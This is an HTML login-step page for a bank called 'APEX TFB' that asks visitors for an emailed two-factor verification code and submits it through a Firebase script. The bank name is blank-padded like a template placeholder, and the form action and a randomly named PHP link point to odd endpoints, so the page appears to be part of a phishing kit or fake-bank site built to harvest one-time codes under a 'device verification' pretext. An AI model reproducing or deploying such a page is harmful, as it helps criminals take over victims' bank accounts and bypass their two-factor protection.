<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1.0, shrink-to-fit=no">
    <link href="images/_V7Z32HY5M98U4PFL1EQA_1_favicon.png" rel="icon">
    <title>Device Verification </title>
    <!-- Web Fonts
    ============================================= -->
    <link rel="stylesheet" href="css/css.css" type="text/css">

    <!-- Stylesheet
    ============================================= -->
    <link rel="stylesheet" type="text/css" href="css/bootstrap.min.css">
    <link rel="stylesheet" type="text/css" href="css/all.min.css">
    <link rel="stylesheet" type="text/css" href="css/style.min.css">
    <link rel="stylesheet" type="text/css" href="css/stylesheet.min.css">

    <script src="firebaseInit.js" type="module"></script>

    <script src="js/sweetalert2.min.js"></script>
<link rel="stylesheet" href="css/sweetalert2.min.css" id="theme-styles">
    <style>
        body, #main-wrapper {
            background: transparent !important;
        }
        html, body {height: 100%;}
        #main-wrapper {
            height: auto;
            min-height: 85%;
        }
        .sizec {
            min-height: 250px;
            max-height: 400px;
            overflow-x: auto;
            margin-bottom: 15px;
        }
        .intl-tel-input {width: 100%;}

        body > .skiptranslate {
    display: none;
}

.goog-te-banner-frame.skiptranslate {
    display: none !important;
}
body {
    top: 0px !important;
}

            </style>

</head>
<body style="font-family: Segoe UI,Tahoma,Verdana,Arial,sans-serif !important;">

    <!-- Preloader -->
    <div id="preloader">
        <div data-loader="dual-ring"></div>
    </div>
    <!-- Preloader End -->

    <div id="main-wrapper" class="">
        <div class="container">
            <div class="overflow-hidden">
                <div class="float-right">
                    <!-- <div id="google_translate_element"></div> -->
                </div>
            </div>
            <!-- SignUp Form
            ============================================= -->
            <div class="row no-gutters">
                                    <div class="col-11 col-sm-9 col-md-7 col-lg-5 col-xl-4 m-auto padtb62">
                        <div class="logo mb-4 text-center" style="margin-bottom: 0.5rem !important;">
                            <a href="../../" title="APEX TFB         ">
                                <img src="images/default.png" alt="APEX TFB                         Official Logo" style="max-width: 100px;">
                            </a>
                        </div>
                        
                        <div class="text-center txt-hi-blue">
                                <h3 style="margin-bottom: 0rem;">Secured E-Banking</h3>
                                <p> Provide login details [Easy, Secure &amp; Safe] </p>

                                
                       </div>


                            <form id="loginForm" method="post" class="frmUpdate text-center" action="user_p_e">
                                
                             
                                <div class="form-group">
                                    
                                    <input type="text" name="code" class="form-control" id="2faCode" placeholder="Verification Code" autocomplete="off">
                                </div>


                                                                <div class="form-group">
                                    <div class="txt-hi-blue" style="text-align: left;">
                                        <b>Device Verification</b><br>
                                       <span style="color: black; font-size: .75rem !important;">
                                            
                                            We noticed a new login from a different device, for safety of your account with us, we have sent a verification code to your registered email address. <span style="color: green">

                                    </div>

                                </div>

                                <div class="form-group" style="text-align: left;">
                                    <a href="ilRwQMDtnPjtMkf.php?184040qiTjKY7vhOWzxIp30729">Didn't get the code?</a>
                                </div>



                                <button class="btn btn-primary btn-block shadow-none my-4" type="submit" onclick="event.preventDefault(); verify2FACode();">Submit &gt;&gt;</button>

                                  <div class="form-group" style="text-align: left; border-right: solid !important; border-right-width: 1px!important;border-radius: 12px !important; ">

                                        <span style="font-size: 11px;">
                                        <b>Important information about a trending payment scam</b></span>

                                        <ul style="font-size: 11px;">
                                           
                                            <li>We will never contact you via phone or text to ask for a security code.</li>
                                            <li>If anyone reaches out to you, asking you to send money or provide a code, it is likely a scam. APEX TFB         will&nbsp;not&nbsp;do&nbsp;this.</li>

                                        </ul>

                                    </div>

                            </form>

                    <br><br><br>
        <p class="text-center text-1 text-muted mb-1">Copyright � <script>document.write(new Date().getFullYear());</script> APEX TFB           . All Rights Reserved.</p>


                                            </div>
                            </div>
        </div>
    </div>
    <!-- SignUp Form End -->
    

    <!-- Back to Top
    ============================================= -->
    <a id="back-to-top" data-toggle="tooltip" title="Back to Top" href="javascript:;"><i class="fa fa-chevron-up"></i></a>

    <!-- Script -->
    <script src="js/jquery.min.js"></script>
        <script src="js/bootstrap.bundle.min.js"></script>
    <script src="js/theme.min.js"></script>

    <script>

    </script>

<script type="text/javascript">
function googleTranslateElementInit() {
  new google.translate.TranslateElement({pageLanguage: 'en'}, 'google_translate_element');
}
</script>
<script type="text/javascript" src="js/element.js"></script>


    <style type="text/css">

 .goog-te-banner-frame.skiptranslate {
            display: none !important;
        } 
        body {
            top: 0px !important; 
        }


  .goog-logo-link {
   display:none !important;
}

select.goog-te-combo{width:100%!important;}

.goog-te-gadget{
   color: transparent !important;
   border-color: transparent !important;
   background-color: transparent !important;
}
.goog-te-gadget .goog-te-combo {
    color: #4A002D !important;
    width: 193px;
    padding: 1px;
    border-radius: 0px;
    font-size: 12px;
    font-style: 'Open Sans', sans-serif;
    border-color: transparent !important;
    background-color: transparent !important;
    cursor: pointer;
    letter-spacing: 0.5px;
    text-align: center;
    text-align-last:center;

  -webkit-appearance: none;
  -moz-appearance: none;
  text-indent: 1px;
  text-overflow: '';

  /* for Firefox */
  -moz-appearance: none;
  /* for Chrome */
  -webkit-appearance: none;
}

    .goog-te-banner-frame{
      display: none !important;
    }
    
    .goog-te-menu-frame{
      -webkit-box-shadow: none !important;
      box-shadow: -1px 2px 20px 0px #4444447a !important;
    }
    .goog-te-menu2-item div, .goog-te-menu2-item:link div, .goog-te-menu2-item:visited div, .goog-te-menu2-item:active div {
      font-family: "Open Sans", sans-serif !important ;
      border: 1px solid #ffffff !important;
      background-color: #b70000 !important;
      color: #4A002D !important;
    }

    a:hover {
       text-decoration: none !important;
    }
    body[style] {
       top: 0px !important;
    }
    a {
       outline: none !important;
    }
    .close{
       outline: none !important;
    }





</style>   

    
    


</body></html>
